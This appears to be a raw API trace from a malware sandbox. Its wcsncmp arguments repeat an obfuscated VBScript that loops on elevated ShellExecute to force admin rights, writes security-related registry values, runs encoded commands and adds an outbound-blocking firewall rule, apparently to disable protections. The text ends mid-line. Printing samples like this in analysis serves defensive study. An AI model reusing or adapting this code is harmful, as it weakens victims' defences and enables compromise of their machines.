bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.357] wcsncmp (_String1="t(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.357] wcsncmp (_String1="(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.358] wcsncmp (_String1="bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0226.358] wcsncmp (_String1="mw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.358] wcsncmp (_String1="w(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 